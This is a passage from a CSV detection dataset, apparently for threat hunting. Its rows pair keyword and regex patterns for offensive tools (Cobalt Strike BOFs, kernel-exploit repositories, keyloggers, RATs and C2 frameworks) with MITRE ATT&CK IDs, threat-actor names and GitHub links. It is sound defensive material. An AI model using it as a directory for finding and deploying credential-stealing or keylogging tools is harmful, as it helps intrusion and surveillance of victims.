validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*kernel-exploits*",".{0,1000}kernel\-exploits.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7825","2827","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z" "*KernelMii.cna*",".{0,1000}KernelMii\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x64.exe*",".{0,1000}KernelMii\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x64.o*",".{0,1000}KernelMii\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x86.exe*",".{0,1000}KernelMii\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x86.o*",".{0,1000}KernelMii\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*kevin.tellier@synacktiv.com*",".{0,1000}kevin\.tellier\@synacktiv\.com.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*KevinJClark/badrats*",".{0,1000}KevinJClark\/badrats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*Kevin-Robertson/Inveigh*",".{0,1000}Kevin\-Robertson\/Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Key`logger running in background*",".{0,1000}Key\`logger\srunning\sin\sbackground.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*keychain2john.py*",".{0,1000}keychain2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*keylistattack.py*",".{0,1000}keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_inject *",".{0,1000}keylog_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*keylog_inject.py*",".{0,1000}keylog_inject\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*keylog_off*",".{0,1000}keylog_off.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_on*",".{0,1000}keylog_on.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_recorder.*",".{0,1000}keylog_recorder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*keylog_recorder.rb*",".{0,1000}keylog_recorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*keylog_start*",".{0,1000}keylog_start.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_stop*",".{0,1000}keylog_stop.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylogger dump*",".{0,1000}keylogger\sdump.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*Keylogger Exception - *",".{0,1000}Keylogger\sException\s\-\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*keylogger is already off*",".{0,1000}keylogger\sis\salready\soff.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*keylogger stopped*",".{0,1000}keylogger\sstopped.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Keylogger*",".{0,1000}Keylogger.{0,1000}","offensive_tool_keyword","keylogger keyword","keylogger keyword. could be related to keylooger tools ","T1056.001 ","TA0006","N/A","N/A","POST Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Keylogger.cs*",".{0,1000}Keylogger\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*keylogger.dll*",".{0,1000}keylogger\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*KeyLogger.dll*",".{0,1000}KeyLogger\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Keylogger.exe*",".{0,1000}Keylogger\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Keylogger.java*",".{0,1000}Keylogger\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*Keylogger.My*",".{0,1000}Keylogger\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*Keylogger.pdb*",".{0,1000}Keylogger\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*keylogger.x64.dll*",".{0,1000}keylogger\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 